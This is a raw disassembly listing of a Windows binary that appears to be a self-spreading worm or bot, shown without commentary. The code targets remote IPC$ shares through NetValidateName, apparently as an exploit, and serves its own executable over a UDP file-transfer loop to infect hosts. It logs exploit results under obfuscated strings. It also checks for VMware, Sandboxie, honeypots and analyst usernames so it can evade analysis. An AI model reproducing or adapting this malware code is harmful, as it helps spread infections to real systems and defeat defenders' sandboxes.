loc_409A9F: ; CODE XREF: sub_4097B9+2ED�j
inc [ebp+arg_0]
test byte ptr [ebp+arg_0], 3
jnz short loc_409A9F
loc_409AA8: ; CODE XREF: sub_4097B9+2E4�j
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409AB4
add [ebp+arg_0], 4
loc_409AB4: ; CODE XREF: sub_4097B9+2F5�j
lea eax, [ebp+var_2C48]
push eax
call sub_42AA07
pop ecx
mov ecx, [ebp+arg_0]
lea eax, [ecx+eax*2+0Eh]
jmp short loc_409ACB
; ---------------------------------------------------------------------------
loc_409ACA: ; CODE XREF: sub_4097B9+314�j
inc eax
loc_409ACB: ; CODE XREF: sub_4097B9+30F�j
test al, 3
jnz short loc_409ACA
add eax, 8
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409ADF
add eax, 4
jmp short loc_409AE1
; ---------------------------------------------------------------------------
loc_409ADF: ; CODE XREF: sub_4097B9+31F�j
inc eax
inc eax
loc_409AE1: ; CODE XREF: sub_4097B9+324�j
push eax
mov [ebp+arg_0], eax
call sub_4297B8
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_C], esi
jz short loc_409A79
push [ebp+arg_0]
push ebx
push esi
call sub_429760
push 4
push offset dword_43EFBC
push esi
call sub_429420
lea eax, [ebp+var_CC48]
push eax
call sub_42AA07
inc eax
mov [esi+8], ebx
mov [esi+0Ch], eax
mov [esi+4], eax
lea eax, [ebp+var_CC48]
push eax
lea eax, [esi+10h]
push eax
call sub_429C39
lea eax, [ebp+var_CC48]
push eax
call sub_42AA07
lea eax, [eax+eax+12h]
add esp, 28h
test al, 3
mov [ebp+var_8], eax
jz short loc_409B53
loc_409B4B: ; CODE XREF: sub_4097B9+395�j
inc eax
test al, 3
jnz short loc_409B4B
mov [ebp+var_8], eax
loc_409B53: ; CODE XREF: sub_4097B9+390�j
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409B71
push 4
add eax, esi
push offset dword_43EFC4
push eax
call sub_429420
add esp, 0Ch
add [ebp+var_8], 4
loc_409B71: ; CODE XREF: sub_4097B9+3A0�j
lea eax, [ebp+var_2C48]
push eax
call sub_42AA07
mov ecx, [ebp+var_8]
inc eax
mov [ecx+esi+8], eax
mov [ecx+esi+4], ebx
mov [ecx+esi], eax
add ecx, 0Ch
mov [ebp+var_8], ecx
lea eax, [ebp+var_2C48]
add ecx, esi
push eax
push ecx
call sub_429C39
lea eax, [ebp+var_2C48]
push eax
call sub_42AA07
mov ecx, [ebp+var_8]
add esp, 10h
lea eax, [ecx+eax*2+2]
test al, 3
mov [ebp+var_8], eax
jz short loc_409BC6
loc_409BBE: ; CODE XREF: sub_4097B9+408�j
inc eax
test al, 3
jnz short loc_409BBE
mov [ebp+var_8], eax
loc_409BC6: ; CODE XREF: sub_4097B9+403�j
push 8
add eax, esi
push ebx
push eax
call sub_429760
mov eax, [ebp+var_8]
add esp, 0Ch
add eax, 8
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409BE7
mov [eax+esi], ebx
jmp short loc_409BED
; ---------------------------------------------------------------------------
loc_409BE7: ; CODE XREF: sub_4097B9+427�j
mov word ptr [eax+esi], 1
loc_409BED: ; CODE XREF: sub_4097B9+42C�j
push 18h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_429760
xor eax, eax
add esp, 0Ch
inc eax
xor ecx, ecx
cmp byte ptr (loc_43F017+1)[edi], bl
push eax
push 10B8h
mov [ebp+var_24], 5
push [ebp+arg_0]
mov [ebp+var_23], bl
setnz cl
push esi
lea esi, [ebp+var_24]
sub esp, 18h
lea ecx, [ecx+ecx+19h]
mov [ebp+var_E], cx
mov [ebp+var_22], bl
push 6
mov [ebp+var_21], 3
pop ecx
mov [ebp+var_20], 10h
mov edi, esp
push [ebp+var_4]
mov [ebp+var_1A], bx
mov [ebp+var_18], eax
mov [ebp+var_10], bx
rep movsd
call sub_4096DA
add esp, 2Ch
test eax, eax
push [ebp+var_4]
jnz short loc_409C7C
call dword_437044 ; CloseHandle
push [ebp+var_C]
call sub_4298F2
pop ecx
loc_409C6A: ; CODE XREF: sub_4097B9+22D�j
; sub_4097B9+2C9�j
push ebx
push ebx
push [ebp+var_7C]
call dword_456FB0
loc_409C75: ; CODE XREF: sub_4097B9+38�j
; sub_4097B9+4A�j
xor eax, eax
jmp loc_409D58
; ---------------------------------------------------------------------------
loc_409C7C: ; CODE XREF: sub_4097B9+4A0�j
call dword_437044 ; CloseHandle
push [ebp+var_C]
call sub_4298F2
pop ecx
push ebx
push ebx
push [ebp+var_7C]
call dword_456FB0
push 7D0h
call dword_437190 ; Sleep
movzx eax, word_44399E
push eax
lea esi, [ebp+arg_4]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz loc_409D55
mov edx, [ebp+arg_B0]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C0], ebx
mov ecx, [ecx]
jz short loc_409D23
cmp [ebp+arg_B8], ebx
jnz short loc_409D2B
push ecx
lea ecx, [ebp+arg_4]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_C8]
push [ebp+arg_CC]
call sub_41CE4A
mov edx, [ebp+arg_B0]
add esp, 1Ch
loc_409D23: ; CODE XREF: sub_4097B9+538�j
cmp [ebp+arg_B8], ebx
jz short loc_409D55
loc_409D2B: ; CODE XREF: sub_4097B9+540�j
shl edx, 6
lea eax, [ebp+arg_4]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_C8]
push [ebp+arg_CC]
call sub_41CDD4
add esp, 1Ch
loc_409D55: ; CODE XREF: sub_4097B9+50D�j
; sub_4097B9+570�j
xor eax, eax
inc eax
loc_409D58: ; CODE XREF: sub_4097B9+4BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_4097B9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+10h]
push ebx
push eax
call sub_404525
pop ecx
cmp eax, 3
pop ecx
jnz short loc_409DCA
push dword ptr [ebp+0Ch]
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push ebx
rep movsd
call sub_4097B9
add esp, 0D0h
lea esi, [ebp+10h]
mov [ebp-4], eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push ebx
rep movsd
call sub_4097B9
add esp, 0D0h
test eax, eax
jnz short loc_409DF0
cmp [ebp-4], eax
jnz short loc_409DF0
jmp short loc_409DF2
; ---------------------------------------------------------------------------
loc_409DCA: ; CODE XREF: .text:00409D76�j
cmp eax, 2
jnz short loc_409DF0
sub esp, 0C4h
lea esi, [ebp+10h]
push 31h
pop ecx
mov edi, esp
push dword ptr [ebp+0Ch]
rep movsd
push dword ptr [ebp+8]
call sub_409FC8
add esp, 0CCh
loc_409DF0: ; CODE XREF: .text:00409DC1�j
; .text:00409DC6�j ...
mov eax, ebx
loc_409DF2: ; CODE XREF: .text:00409DC8�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
lea eax, [ebp+10h]
push 1
push eax
call sub_404525
pop ecx
cmp eax, 3
pop ecx
jnz loc_409EB4
mov ebx, [ebp+0Ch]
lea esi, [ebp+10h]
push ebx
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 0
rep movsd
call sub_4097B9
add esp, 0D0h
lea esi, [ebp+10h]
mov [ebp+0Ch], eax
push ebx
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 0
rep movsd
call sub_4097B9
add esp, 0D0h
test eax, eax
jnz short loc_409E88
cmp [ebp+0Ch], eax
jnz short loc_409E88
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 2
rep movsd
call sub_4097B9
add esp, 0D0h
mov [ebp+0Ch], eax
loc_409E88: ; CODE XREF: .text:00409E5D�j
; .text:00409E62�j
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 2
rep movsd
call sub_4097B9
add esp, 0D0h
test eax, eax
jnz short loc_409EDA
cmp [ebp+0Ch], eax
jnz short loc_409EDA
jmp short loc_409EDD
; ---------------------------------------------------------------------------
loc_409EB4: ; CODE XREF: .text:00409E0D�j
cmp eax, 2
jnz short loc_409EDA
sub esp, 0C4h
lea esi, [ebp+10h]
push 31h
pop ecx
mov edi, esp
push dword ptr [ebp+0Ch]
rep movsd
push dword ptr [ebp+8]
call sub_409FC8
add esp, 0CCh
loc_409EDA: ; CODE XREF: .text:00409EAB�j
; .text:00409EB0�j ...
xor eax, eax
inc eax
loc_409EDD: ; CODE XREF: .text:00409EB2�j
pop edi
pop esi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409EE2 proc near ; DATA XREF: sub_409FAF+6�o
var_220 = byte ptr -220h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 220h
push edi
push offset aNetapi32_dll ; "netapi32.dll"
call dword_437034 ; LoadLibraryA
push offset aNetvalidatenam ; "NetValidateName"
push eax
mov dword_4557E0, eax
call dword_437030 ; GetProcAddress
xor edi, edi
mov dword_4557D4, eax
cmp eax, edi
jz loc_409FAC
push esi
mov esi, 80h
push [ebp+arg_0]
lea eax, [ebp+var_120]
push offset aSIpc_0 ; "\\\\%s\\IPC$"
push esi
push eax
call sub_429BBE
push [ebp+arg_0]
lea eax, [ebp+var_A0]
push offset aS_0 ; "\\\\%s"
push esi
push eax
call sub_429BBE
add esp, 20h
lea eax, [ebp+var_220]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_4293A0
pop ecx
inc eax
push eax
lea eax, [ebp+var_A0]
push eax
push edi
push edi
call dword_437184 ; MultiByteToWideChar
lea eax, [ebp+var_120]
push edi
mov [ebp+var_C], eax
mov eax, offset byte_454A54
push eax
push eax
lea eax, [ebp+var_20]
mov [ebp+var_10], edi
push eax
mov [ebp+var_4], edi
mov [ebp+var_1C], edi
call sub_4290C4
push edi
push edi
push edi
lea eax, [ebp+var_220]
push offset byte_4557E8
push eax
call dword_4557D4
add esp, 14h
pop esi
loc_409FAC: ; CODE XREF: sub_409EE2+2F�j
pop edi
leave
retn
sub_409EE2 endp
; =============== S U B R O U T I N E =======================================
sub_409FAF proc near ; CODE XREF: sub_409FC8+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push offset sub_409EE2
call sub_42AB81
add esp, 0Ch
mov dword_4557D8, eax
retn
sub_409FAF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409FC8 proc near ; CODE XREF: .text:00409DE5�p
; .text:00409ECF�p
var_190 = byte ptr -190h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
sub esp, 190h
push esi
push edi
lea eax, [ebp+arg_8]
push 1
push eax
call sub_404525
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+arg_8]
jz short loc_409FEB
push 1
jmp short loc_409FED
; ---------------------------------------------------------------------------
loc_409FEB: ; CODE XREF: sub_409FC8+1D�j
push 5
loc_409FED: ; CODE XREF: sub_409FC8+21�j
push eax
call sub_404525
pop ecx
mov esi, eax
pop ecx
lea eax, [ebp+arg_8]
push eax
call dword_4372C0 ; inet_addr
cmp esi, 9
jz short loc_40A085
push 5
cmp esi, 3
pop eax
jnz short loc_40A011
push 4
pop eax
loc_40A011: ; CODE XREF: sub_409FC8+44�j
cmp esi, 2
jnz short loc_40A019
xor eax, eax
inc eax
loc_40A019: ; CODE XREF: sub_409FC8+4C�j
mov edi, dword_43F048[eax*4]
mov esi, 0A28h
push esi
push 90h
push offset byte_4557E8
call sub_429760
mov eax, edi
mov ecx, 1FBh
mov edi, offset byte_4557E9
add esp, 0Ch
rep stosd
lea eax, [ebp+var_190]
push eax
push 101h
call dword_4372B8 ; WSAStartup
test eax, eax
jnz short loc_40A085
push 6
push 1
push 2
call dword_4372BC ; socket
mov ax, word_44399E
push eax
call dword_4372C4 ; ntohs
mov ecx, dword_43F060
lea eax, [ecx+7FEh]
cmp eax, esi
jle short loc_40A08C
loc_40A085: ; CODE XREF: sub_409FC8+3C�j
; sub_409FC8+92�j
xor eax, eax
jmp loc_40A17A
; ---------------------------------------------------------------------------
loc_40A08C: ; CODE XREF: sub_409FC8+BB�j
test ecx, ecx
jle short loc_40A0A8
mov eax, ecx
mov esi, offset dword_43A8E8
mov edi, offset word_455FE6
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_40A0A8: ; CODE XREF: sub_409FC8+C6�j
lea eax, [ebp+arg_8]
push 14h
push eax
call sub_409FAF
pop ecx
pop ecx
push 7D0h
call dword_437190 ; Sleep
movzx eax, word_44399E
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz loc_40A16D
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], 0
mov ecx, [ecx]
jz short loc_40A13E
cmp [ebp+arg_BC], 0
jnz short loc_40A147
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CE4A
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_40A13E: ; CODE XREF: sub_409FC8+149�j
cmp [ebp+arg_BC], 0
jz short loc_40A177
loc_40A147: ; CODE XREF: sub_409FC8+152�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CDD4
add esp, 1Ch
jmp short loc_40A177
; ---------------------------------------------------------------------------
loc_40A16D: ; CODE XREF: sub_409FC8+11D�j
lea eax, [ebp+arg_8]
push eax
call sub_401E9E
pop ecx
loc_40A177: ; CODE XREF: sub_409FC8+17D�j
; sub_409FC8+1A3�j
xor eax, eax
inc eax
loc_40A17A: ; CODE XREF: sub_409FC8+BF�j
pop edi
pop esi
leave
retn
sub_409FC8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A17E proc near ; CODE XREF: .text:0040A262�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
mov [ebp+var_10], 2
call dword_456F38 ; ntohs
mov [ebp+var_E], ax
and [ebp+var_C], 0
lea eax, [ebp+arg_4]
push 4
push eax
push 4
push 0FFFFh
mov [ebp+arg_4], 1
push [ebp+arg_0]
call dword_456F10 ; setsockopt
test eax, eax
jnz short loc_40A1E6
lea eax, [ebp+var_10]
push 10h
push eax
push [ebp+arg_0]
call dword_456F6C ; bind
cmp eax, 0FFFFFFFFh
jz short loc_40A1E6
cmp [ebp+arg_8], 0
jnz short loc_40A1EA
push 0Ah
push [ebp+arg_0]
call dword_456F68 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_40A1EA
loc_40A1E6: ; CODE XREF: sub_40A17E+3C�j
; sub_40A17E+50�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40A1EA: ; CODE XREF: sub_40A17E+56�j
; sub_40A17E+66�j
xor eax, eax
inc eax
leave
retn
sub_40A17E endp
; ---------------------------------------------------------------------------
loc_40A1EF: ; DATA XREF: sub_40A9FE+6884�o
push ebp
mov ebp, esp
sub esp, 604h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp-0F4h]
rep movsd
xor edi, edi
xor ebx, ebx
inc edi
push ebx
mov [eax+0BCh], edi
mov eax, [ebp-0F4h]
push 2
push 2
mov [ebp-8], eax
call dword_456FD0 ; socket
push 0Bh
mov esi, eax
call sub_42381F
imul eax, 2724h
cmp esi, ebx
pop ecx
mov dword_46D730[eax], esi
jnz short loc_40A24B
push ebx
call dword_437174 ; ExitThread
loc_40A24B: ; CODE XREF: .text:0040A242�j
push edi
push 45h
push 0Bh
call sub_42381F
imul eax, 2724h
pop ecx
push dword_46D730[eax]
call sub_40A17E
add esp, 0Ch
test eax, eax
jnz short loc_40A275
push ebx
call dword_437174 ; ExitThread
loc_40A275: ; CODE XREF: .text:0040A26C�j
lea eax, [ebp-604h]
push 104h
push eax
push ebx
call dword_43717C ; GetModuleFileNameA
test eax, eax
jz loc_40A50D
lea eax, [ebp-604h]
push offset aRb ; "rb"
push eax
call sub_42A50C
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+8], eax
jz loc_40A50D
mov esi, 200h
loc_40A2B3: ; CODE XREF: .text:0040A313�j
; .text:0040A3EE�j ...
push 0Bh
mov dword ptr [ebp-10h], 5
mov dword ptr [ebp-0Ch], 1388h
mov [ebp-500h], ebx
call sub_42381F
imul eax, 2724h
inc dword ptr [ebp-500h]
mov dword ptr [esp], 104h
mov eax, dword_46D730[eax]
push ebx
mov [ebp-4FCh], eax
lea eax, [ebp-3FCh]
push eax
call sub_429760
add esp, 0Ch
lea eax, [ebp-10h]
push eax
push ebx
lea eax, [ebp-500h]
push ebx
push eax
push ebx
call dword_456F1C ; select
test eax, eax
jz short loc_40A2B3
push 10h
lea eax, [ebp-4]
pop edi
push eax
lea eax, [ebp-20h]
push eax
push ebx
lea eax, [ebp-3FCh]
push 104h
push eax
push 0Bh
mov [ebp-4], edi
call sub_42381F
imul eax, 2724h
pop ecx
push dword_46D730[eax]
call dword_456F04 ; recvfrom
test eax, eax
jz loc_40A506
push dword ptr [ebp-1Ch]
call dword_456FDC ; inet_ntoa
push eax
lea eax, [ebp-30h]
push edi
push eax
call sub_429BBE
add esp, 0Ch
cmp [ebp-3FCh], bl
jnz loc_40A4F2
cmp byte ptr [ebp-3FBh], 1
jnz short loc_40A3F3
push offset dword_4439A8
call sub_4293A0
push ebx
push ebx
push dword ptr [ebp+8]
call sub_42A422
push dword ptr [ebp+8]
lea eax, [ebp-2F4h]
mov [ebp-2F8h], bl
mov byte ptr [ebp-2F7h], 3
push esi
push 1
push eax
mov [ebp-2F6h], bl
mov byte ptr [ebp-2F5h], 1
call sub_42A188
add esp, 20h
lea ecx, [ebp-20h]
add eax, 4
push dword ptr [ebp-4]
push ecx
push ebx
push eax
lea eax, [ebp-2F8h]
push eax
loc_40A3D4: ; CODE XREF: .text:0040A501�j
push 0Bh
call sub_42381F
imul eax, 2724h
pop ecx
push dword_46D730[eax]
call dword_456FAC ; sendto
jmp loc_40A2B3
; ---------------------------------------------------------------------------
loc_40A3F3: ; CODE XREF: .text:0040A37C�j
cmp byte ptr [ebp-3FBh], 4
jnz loc_40A4F2
mov cl, [ebp-3F9h]
mov al, [ebp-3FAh]
cmp cl, 0FFh
mov [ebp-2F8h], bl
mov byte ptr [ebp-2F7h], 3
jnz short loc_40A42A
inc al
xor cl, cl
mov [ebp-2F5h], bl
jmp short loc_40A432
; ---------------------------------------------------------------------------
loc_40A42A: ; CODE XREF: .text:0040A41C�j
inc cl
mov [ebp-2F5h], cl
loc_40A432: ; CODE XREF: .text:0040A428�j
mov [ebp-2F6h], al
push ebx
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
shl eax, 9
sub eax, esi
push eax
push dword ptr [ebp+8]
call sub_42A422
push dword ptr [ebp+8]
lea eax, [ebp-2F4h]
push esi
push 1
push eax
call sub_42A188
add esp, 1Ch
mov edi, eax
lea eax, [ebp-20h]
push dword ptr [ebp-4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp-2F8h]
push eax
push 0Bh
call sub_42381F
imul eax, 2724h
pop ecx
push dword_46D730[eax]
call dword_456FAC ; sendto
cmp edi, ebx
jnz short loc_40A4C4
cmp [ebp-44h], ebx
jz short loc_40A4C4
cmp [ebp-3Ch], ebx
jnz short loc_40A4CD
lea eax, [ebp-30h]
push eax
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
lea eax, [ebp-0F0h]
push offset dword_43F0B0
push eax
push dword ptr [ebp-8]
call sub_41CE4A
add esp, 14h
loc_40A4C4: ; CODE XREF: .text:0040A498�j
; .text:0040A49D�j
cmp [ebp-3Ch], ebx
jz loc_40A2B3
loc_40A4CD: ; CODE XREF: .text:0040A4A2�j
lea eax, [ebp-30h]
push eax
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
lea eax, [ebp-0F0h]
push offset dword_43F0B0
push eax
push dword ptr [ebp-8]
call sub_41CDD4
add esp, 14h
jmp loc_40A2B3
; ---------------------------------------------------------------------------
loc_40A4F2: ; CODE XREF: .text:0040A36F�j
; .text:0040A3FA�j
push dword ptr [ebp-4]
lea eax, [ebp-20h]
push eax
push ebx
push 9
push offset dword_43F0A4
jmp loc_40A3D4
; ---------------------------------------------------------------------------
loc_40A506: ; CODE XREF: .text:0040A34C�j
push ebx
call dword_437174 ; ExitThread
loc_40A50D: ; CODE XREF: .text:0040A28A�j
; .text:0040A2A8�j
push ebx
call dword_437174 ; ExitThread
loc_40A514: ; CODE XREF: sub_40A7C5+A1�p
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437308
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp-18h], esp
and byte ptr [ebp-19h], 0
and dword ptr [ebp-4], 0
push ebx
mov ebx, 0
mov eax, 1
; ---------------------------------------------------------------------------
db 0Fh, 3Fh, 7
dd 0FDB850Bh, 5BE74594h, 458B34EBh, 0E04589ECh, 8BE0458Bh
dd 45890440h, 0DC4D8BDCh, 89FFC883h, 0A481h, 0DC4D8B00h
dd 0B8898Bh, 0C1830000h, 0DC558B04h, 0B88A89h, 8BC30000h
dd 4D83E865h, 458AFFFCh, 0F04D8BE7h, 0D8964h, 5F000000h
dd 0C3C95B5Eh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5A4 proc near ; CODE XREF: sub_40A7C5+AA�p
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437318
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_19], 1
and [ebp+var_4], 0
push edx
push ecx
push ebx
mov eax, 564D5868h
mov ebx, 0
mov ecx, 0Ah
mov edx, 5658h
in eax, dx
cmp ebx, 564D5868h
setz [ebp+var_19]
pop ebx
pop ecx
pop edx
jmp short loc_40A604
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
and [ebp+var_19], 0
loc_40A604: ; CODE XREF: sub_40A5A4+53�j
or [ebp+var_4], 0FFFFFFFFh
mov al, [ebp+var_19]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A5A4 endp
; =============== S U B R O U T I N E =======================================
sub_40A61A proc near ; CODE XREF: sub_40A7C5:loc_40A80D�p
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
add dword ptr [eax+20h], 2000h
retn
sub_40A61A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A62E proc near ; CODE XREF: sub_40A7C5+B3�p
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 104h
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call dword_43717C ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_43F0C0
push eax
call sub_42AEA0
pop ecx
xor eax, eax
pop ecx
leave
retn
sub_40A62E endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A662 proc near ; CODE XREF: sub_40A7C5+BC�p
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push esi
lea eax, [ebp+var_4]
push edi
push eax
lea eax, [ebp+var_B4]
mov esi, offset aTu4nh09smcg1hc ; "TU-4NH09SMCG1HC"
push eax
mov [ebp+var_34], esi
mov [ebp+var_30], offset aRoo ; "roo"
mov [ebp+var_2C], offset aSandbox ; "Sandbox"
mov [ebp+var_28], offset aSnort ; "snort"
mov [ebp+var_24], offset aHoney ; "honey"
mov [ebp+var_20], offset aHoneyc ; "honeyc"
mov [ebp+var_1C], offset aHoneyd ; "honeyd"
mov [ebp+var_18], offset aHoneymule ; "HoneyMule"
mov [ebp+var_14], offset aVmware ; "vmware"
mov [ebp+var_10], offset aCurrentuser ; "currentuser"
mov [ebp+var_C], offset aNepenthes ; "nepenthes"
mov [ebp+var_8], offset aImail8_001531N ; "(IMail 8.00 153-1) NT-ESMTP Server X1"
mov [ebp+var_4], 80h
call dword_43700C ; GetUserNameA
lea eax, [ebp+var_B4]
push eax
call dword_43726C ; CharLowerA
xor edi, edi
loc_40A6E9: ; CODE XREF: sub_40A662+A1�j
push [ebp+edi*4+var_34]
lea eax, [ebp+var_B4]
push eax
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_40A72C
inc edi
cmp edi, 0Ch
jb short loc_40A6E9
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_134]
push eax
call dword_43709C ; GetComputerNameA
test eax, eax
jz short loc_40A731
lea eax, [ebp+var_134]
push esi
push eax
call dword_437178 ; lstrcmpiA
test eax, eax
jnz short loc_40A731
loc_40A72C: ; CODE XREF: sub_40A662+9B�j
xor eax, eax
inc eax
jmp short loc_40A733
; ---------------------------------------------------------------------------
loc_40A731: ; CODE XREF: sub_40A662+B6�j
; sub_40A662+C8�j
xor eax, eax
loc_40A733: ; CODE XREF: sub_40A662+CD�j
pop edi
pop esi
leave
retn
sub_40A662 endp
; =============== S U B R O U T I N E =======================================
sub_40A737 proc near ; CODE XREF: sub_40A7C5+C5�p
push ebx
push esi
mov ebx, 224h
push edi
push ebx
call sub_4297B8
mov esi, eax
pop ecx
test esi, esi
jz short loc_40A7BA
call dword_4370AC ; GetCurrentProcessId
push eax
push 8
call sub_4290AC ; CreateToolhelp32Snapshot
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_40A7BA
push esi
push edi
mov [esi], ebx
call sub_4290A6 ; Module32First
test eax, eax
jz short loc_40A7AC
push esi
push edi
call sub_4290A0 ; Module32Next
test eax, eax
jz short loc_40A7AC
lea ebx, [esi+120h]
loc_40A77F: ; CODE XREF: sub_40A737+73�j
push offset aSbiedllx ; "SbieDllX"
push ebx
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_40A7C0
push offset aSandboxie ; "Sandboxie"
push ebx
call sub_42AEA0
pop ecx
test eax, eax
pop ecx
jnz short loc_40A7C0
push esi
push edi
call sub_4290A0 ; Module32Next
test eax, eax
jnz short loc_40A77F
loc_40A7AC: ; CODE XREF: sub_40A737+35�j
; sub_40A737+40�j
push edi
call dword_437044 ; CloseHandle
push esi
call sub_4298F2
pop ecx
loc_40A7BA: ; CODE XREF: sub_40A737+13�j
; sub_40A737+28�j
xor eax, eax
loc_40A7BC: ; CODE XREF: sub_40A737+8C�j
pop edi
pop esi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_40A7C0: ; CODE XREF: sub_40A737+57�j
; sub_40A737+68�j
xor eax, eax
inc eax
jmp short loc_40A7BC
sub_40A737 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A7C5 proc near ; CODE XREF: sub_418E0F+F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
cmp dword_456210, 0
push ebx
push esi
push edi
jz short loc_40A7DF
xor eax, eax
inc eax
jmp loc_40A917
; ---------------------------------------------------------------------------
loc_40A7DF: ; CODE XREF: sub_40A7C5+10�j
and [ebp+var_4], 0
mov esi, offset aKernel32_dll ; "KERNEL32.DLL"
push esi
call dword_437070 ; GetModuleHandleA
test eax, eax
jnz short loc_40A7FE
push esi
call dword_437034 ; LoadLibraryA
test eax, eax
